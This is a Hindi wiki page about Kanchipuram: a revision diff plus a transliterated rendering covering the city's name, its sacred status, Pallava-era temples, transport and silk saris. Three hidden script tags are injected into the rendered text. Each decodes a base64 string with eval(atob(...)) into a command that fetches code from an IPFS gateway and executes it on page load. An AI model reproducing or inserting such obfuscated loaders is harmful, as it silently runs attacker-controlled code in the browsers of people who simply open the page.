Difference between revisions of "कांचीपुरम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 1: Line 1:
[[चित्र:Kanchipuram-Temple- India.jpg|thumb|250px|कांचीपुरम मंदिर, कांचीपुरम<br />Kanchipuram Temple, Kanchipuram]]
+
[[चित्र:Kanchipuram-Temple- India.jpg|thumb|250px|कांचीपुरम मंदिर, कांचीपुरम]]
*कांचीपुरम तीर्थपुरी दक्षिण की काशी मानी जाती है, जो [[मद्रास]] से 45 मील की दूरी पर दक्षिण–पश्चिम में स्थित है। कांचीपुरम को कांची भी कहा जाता है। यह आधुनिक काल में कांचीवरम के नाम से भी प्रसिद्ध है।
+
'''कांचीपुरम''' उत्तरी [[तमिलनाडु]] के प्राचीन व मशहूर शहरों में से एक है। कांचीपुरम तीर्थपुरी दक्षिण की काशी मानी जाती है, जो [[मद्रास]] से 45 मील की दूरी पर दक्षिण–पश्चिम में स्थित है। कांचीपुरम को कांची भी कहा जाता है। यह आधुनिक काल में कांचीवरम के नाम से भी प्रसिद्ध है। कांचीपुरम को पूर्व में कांची, कांचीअम्पाठी, कांजीवरम कहा जाता था और इसे ''द गोल्डन सिटी ऑफ़ 1000 टेंपल'' भी कहा जाता है। कांचीपुरम को [[भारत]] के सात पवित्र शहरों में से एक का दर्जा भी प्राप्त है।
*ऐसी अनुश्रुति है कि इस क्षेत्र में प्राचीन काल में ब्रह्म जी ने देवी के दर्शन के लिये तप किया था।  
+
==कांचीपुरम का अर्थ==
 +
{{tocright}}
 +
कांची का अर्थ (ब्रह्मा), आंची का अर्थ (पूजा) और पुरम का अर्थ (शहर) होता है यानी ब्रह्मा को पूजने वाला पवित्र स्थान। शायद इसलिए यहाँ [[विष्णु]] के अनेक मंदिर स्थापित किए गये हैं, जिस कारण इसे यह नाम दिया गया था।
 +
==सप्त पुरियों में गणना==
 +
*ऐसी अनुश्रुति है कि इस क्षेत्र में प्राचीन काल में [[ब्रह्मा|ब्रह्माजी]] ने देवी के दर्शन के लिये तप किया था।  
 +
*ऐसा माना जाता है कि जो भी यहाँ जाता है, उसे आंतरिक खुशी के साथ-साथ मोक्ष की प्राप्ति होती है।
 
*मोक्षदायिनी सप्त पुरियों [[अयोध्या]], [[मथुरा]], [[द्वारका]], माया([[हरिद्वार]]), [[काशी]] और अवन्तिका ([[उज्जैन]]) में इसकी गणना है।  
 
*मोक्षदायिनी सप्त पुरियों [[अयोध्या]], [[मथुरा]], [[द्वारका]], माया([[हरिद्वार]]), [[काशी]] और अवन्तिका ([[उज्जैन]]) में इसकी गणना है।  
 
*कांची हरिहरात्मक पुरी है। इसके दो भाग शिवकांची और विष्णुकांची हैं। सम्भवत: कामाक्षी मन्दिर ही यहाँ का शक्तिपीठ है। दक्षिण के पंच तत्वलिंगो में से भूतत्वलिंग के सम्बन्ध में कुछ मतभेद है। कुछ लोग कांची के एकाम्रेश्वर लिंग को भूतत्वलिंग मानते हैं, और कुछ लोग [[तिरुवारूर]] की त्यागराजलिंग मूर्ति को। इसका माहात्म्य निम्नलिखित हैं।<br />
 
*कांची हरिहरात्मक पुरी है। इसके दो भाग शिवकांची और विष्णुकांची हैं। सम्भवत: कामाक्षी मन्दिर ही यहाँ का शक्तिपीठ है। दक्षिण के पंच तत्वलिंगो में से भूतत्वलिंग के सम्बन्ध में कुछ मतभेद है। कुछ लोग कांची के एकाम्रेश्वर लिंग को भूतत्वलिंग मानते हैं, और कुछ लोग [[तिरुवारूर]] की त्यागराजलिंग मूर्ति को। इसका माहात्म्य निम्नलिखित हैं।<br />
Line 12: Line 17:
 
पद्मासने च तिष्ठ्न्ती विष्णुना जिष्णुना सह।<br />
 
पद्मासने च तिष्ठ्न्ती विष्णुना जिष्णुना सह।<br />
 
सर्वश्रृगांर वेषाढया सर्वाभरण्भूषिता॥<ref>ब्रह्माण्डपु. ललितोपाख्यान 35</ref><br /></blockquote>
 
सर्वश्रृगांर वेषाढया सर्वाभरण्भूषिता॥<ref>ब्रह्माण्डपु. ललितोपाख्यान 35</ref><br /></blockquote>
[[चित्र:Kailasanathar-Temple-Kanchipuram.jpg|thumb|250px|कैलाशनाथार मंदिर, कांचीपुरम<br />Kailasanathar Temple Kanchipuram]]
+
[[चित्र:Kailasanathar-Temple-Kanchipuram.jpg|thumb|250px|कैलाशनाथार मंदिर, कांचीपुरम]]
*यह ईसा की आरम्भिक शताब्दियों में महत्त्वपूर्ण नगर था। सम्भवत: यह दक्षिण [[भारत]] का नहीं तो [[तमिलनाडु]] का सबसे बड़ा केन्द्र था।  
+
==इतिहास==
 +
*कांचीपुरम ईसा की आरम्भिक शताब्दियों में महत्त्वपूर्ण नगर था। सम्भवत: यह [[दक्षिण भारत]] का ही नहीं बलकी [[तमिलनाडु]] का सबसे बड़ा केन्द्र था।  
 
*बुद्धघोष के समकालीन प्रसिद्ध भाष्यकार धर्मपाल का जन्म स्थान यहीं था, इससे अनुमान किया जाता है कि यह बौद्धधर्मीय जीवन का केन्द्र था।  
 
*बुद्धघोष के समकालीन प्रसिद्ध भाष्यकार धर्मपाल का जन्म स्थान यहीं था, इससे अनुमान किया जाता है कि यह बौद्धधर्मीय जीवन का केन्द्र था।  
*यहाँ के सुन्दरतम मन्दिरों की परम्परा इस वात को प्रमाणित करती है कि यह स्थान दक्षिण [[भारत]] के धार्मिक क्रियाकलाप का अनेकों शताब्दियों तक केन्द्र रहा है।  
+
*यहाँ के सुन्दरतम मन्दिरों की परम्परा इस बात को प्रमाणित करती है कि यह स्थान दक्षिण भारत के धार्मिक क्रियाकलाप का अनेकों शताब्दियों तक केन्द्र रहा है।  
*छ्ठी शताब्दी में पल्लवों के संरक्षण से प्रारम्भ कर पन्द्रहवीं एवं सोलहवीं शताब्दी तक विजयनगर के राजाओं के संरक्षणकाल के मध्य 1000 वर्ष के द्रविड़ मन्दिर शिल्प के विकास को यहाँ एक ही स्थान में देखा जा सकता है।  
+
*कांचीपुरम 7वीं शताब्दी से लेकर 9वीं शताब्दी में [[पल्लव साम्राज्य]] का ऐतिहासिक शहर व राजधानी हुआ करती थी।
*‘कैलासनाथ’ मन्दिर इस कला के चरमोत्कर्ष का उदाहरण है। एक दशाब्दी पीछे का बना ‘वैकुण्ठ पेरुमल’ इस कला के सौष्ठव का सूचक है। उपयुक्त दोनों मन्दिर पल्ल्व नृपों के शिल्पकला प्रेम के उत्कृष्ट उदाहरण हैं।  
+
*छ्ठी शताब्दी में [[पल्लव|पल्लवों]] के संरक्षण से प्रारम्भ कर पन्द्रहवीं एवं सोलहवीं शताब्दी तक विजयनगर के राजाओं के संरक्षणकाल के मध्य 1000 वर्ष के द्रविड़ मन्दिर शिल्प के विकास को यहाँ एक ही स्थान में देखा जा सकता है।  
{{प्रचार}}
+
*'कैलासनाथ मन्दिर' इस कला के चरमोत्कर्ष का उदाहरण है। एक दशाब्दी पीछे का बना 'वैकुण्ठ पेरुमल' इस कला के सौष्ठव का सूचक है। उपयुक्त दोनों मन्दिर पल्ल्व नृपों के शिल्पकला प्रेम के उत्कृष्ट उदाहरण हैं।  
 +
==यातायात==
 +
;हवाई मार्ग
 +
कांचीपुरम का सबसे नज़दीकी हवाई अड्डा [[चेन्नई]] में है, जो 75 किमी की दूरी पर स्थित है। चैन्नई से कांचीपुरम लगभग 2 घंटे में पहुँचा जा सकता है।
 +
;रेल मार्ग
 +
कांचीपुरम का रेलवे स्टेशन चैन्नई, चेन्गलपट्टू, तिरूपति और [[बैंगलोर]] से जुड़ा है।
 +
;सड़क मार्ग
 +
कांचीपुरम तमिलनाडु के लगभग सभी शहरों से सड़क मार्ग से जुड़ा है। विभिन्न शहरों से कांचीपुरम के लिए नियमित अंतराल में बसें चलती हैं।
 +
==ख़रीददारी==
 +
कांचीपुरम सिल्क फैब्रिक और हाथ से बुनी रेशमी साड़ियों के लिए भी देश-दुनिया में मशहूर है। बुनाई करने वाले उच्च क्वालिटी की सिल्क और शुद्ध [[सोना|सोने]] के तार इन साड़ियों पर इस्तमाल कर एक से बढ़कर एक ख़ूबसूरत साड़ियों का निर्माण करते हैं। इसलिए इसे ''सिल्क सिटी'' भी कहते हैं। कुछ ख़रीदने की इच्छा हो तो इन सिल्क की साड़ियों की शॉपिंग जरूर करें क्योंकि दूसरे शहरों के मुकाबले ये यहाँ उचित व कम दामों में मिल जाती हैं।
 +
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 27: Line 43:
 
}}
 
}}
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 05:28, 23 January 2012

thumb|250px|kaanchipuram mandir, kaanchipuram kaanchipuram uttari tamilanadu ke prachin v mashahoor shaharoan mean se ek hai. kaanchipuram tirthapuri dakshin ki kashi mani jati hai, jo madras se 45 mil ki doori par dakshin–pashchim mean sthit hai. kaanchipuram ko kaanchi bhi kaha jata hai. yah adhunik kal mean kaanchivaram ke nam se bhi prasiddh hai. kaanchipuram ko poorv mean kaanchi, kaanchiampathi, kaanjivaram kaha jata tha aur ise d goldan siti aauf 1000 teanpal bhi kaha jata hai. kaanchipuram ko bharat ke sat pavitr shaharoan mean se ek ka darja bhi prapt hai.

kaanchipuram ka arth

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kaanchi ka arth (brahma), aanchi ka arth (pooja) aur puram ka arth (shahar) hota hai yani brahma ko poojane vala pavitr sthan. shayad isalie yahaan vishnu ke anek mandir sthapit kie gaye haian, jis karan ise yah nam diya gaya tha.

sapt puriyoan mean ganana

  • aisi anushruti hai ki is kshetr mean prachin kal mean brahmaji ne devi ke darshan ke liye tap kiya tha.
  • aisa mana jata hai ki jo bhi yahaan jata hai, use aantarik khushi ke sath-sath moksh ki prapti hoti hai.
  • mokshadayini sapt puriyoan ayodhya, mathura, dvaraka, maya(haridvar), kashi aur avantika (ujjain) mean isaki ganana hai.
  • kaanchi hariharatmak puri hai. isake do bhag shivakaanchi aur vishnukaanchi haian. sambhavat: kamakshi mandir hi yahaan ka shaktipith hai. dakshin ke panch tatvaliango mean se bhootatvaliang ke sambandh mean kuchh matabhed hai. kuchh log kaanchi ke ekamreshvar liang ko bhootatvaliang manate haian, aur kuchh log tiruvaroor ki tyagarajaliang moorti ko. isaka mahatmy nimnalikhit haian.

rahasyan sampravakshyami lopamudrapate shrrinu.

netradvayan maheshasy kashikanchipuridvayamh॥
vikhyatan vaishnavan kshetran shivasaannidhyakakamh.
kanchikshetrean pura dhata sarvalokapitamah:॥
shridevidarshanarthay tapastepe sudushkaramh.
praduras puro lakshmi: padmahastapurassara.
padmasane ch tishthnti vishnuna jishnuna sah.

sarvashrrigaanr veshadhaya sarvabharanbhooshita॥[1]

thumb|250px|kailashanathar mandir, kaanchipuram

itihas

  • kaanchipuram eesa ki arambhik shatabdiyoan mean mahattvapoorn nagar tha. sambhavat: yah dakshin bharat ka hi nahian balaki tamilanadu ka sabase b da kendr tha.
  • buddhaghosh ke samakalin prasiddh bhashyakar dharmapal ka janm sthan yahian tha, isase anuman kiya jata hai ki yah bauddhadharmiy jivan ka kendr tha.
  • yahaan ke sundaratam mandiroan ki parampara is bat ko pramanit karati hai ki yah sthan dakshin bharat ke dharmik kriyakalap ka anekoan shatabdiyoan tak kendr raha hai.
  • kaanchipuram 7vian shatabdi se lekar 9vian shatabdi mean pallav samrajy ka aitihasik shahar v rajadhani hua karati thi.
  • chhthi shatabdi mean pallavoan ke sanrakshan se prarambh kar pandrahavian evan solahavian shatabdi tak vijayanagar ke rajaoan ke sanrakshanakal ke madhy 1000 varsh ke dravi d mandir shilp ke vikas ko yahaan ek hi sthan mean dekha ja sakata hai.
  • 'kailasanath mandir' is kala ke charamotkarsh ka udaharan hai. ek dashabdi pichhe ka bana 'vaikunth perumal' is kala ke saushthav ka soochak hai. upayukt donoan mandir pallv nripoan ke shilpakala prem ke utkrisht udaharan haian.

yatayat

havaee marg

kaanchipuram ka sabase nazadiki havaee adda chennee mean hai, jo 75 kimi ki doori par sthit hai. chainnee se kaanchipuram lagabhag 2 ghante mean pahuancha ja sakata hai.

rel marg

kaanchipuram ka relave steshan chainnee, chengalapattoo, tiroopati aur baiangalor se ju da hai.

s dak marg

kaanchipuram tamilanadu ke lagabhag sabhi shaharoan se s dak marg se ju da hai. vibhinn shaharoan se kaanchipuram ke lie niyamit aantaral mean basean chalati haian.

kharidadari

kaanchipuram silk phaibrik aur hath se buni reshami sa diyoan ke lie bhi desh-duniya mean mashahoor hai. bunaee karane vale uchch kvaliti ki silk aur shuddh sone ke tar in sa diyoan par istamal kar ek se badhakar ek khoobasoorat sa diyoan ka nirman karate haian. isalie ise silk siti bhi kahate haian. kuchh kharidane ki ichchha ho to in silk ki sa diyoan ki sh aaupiang jaroor karean kyoanki doosare shaharoan ke mukabale ye yahaan uchit v kam damoan mean mil jati haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. brahmandapu. lalitopakhyan 35

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>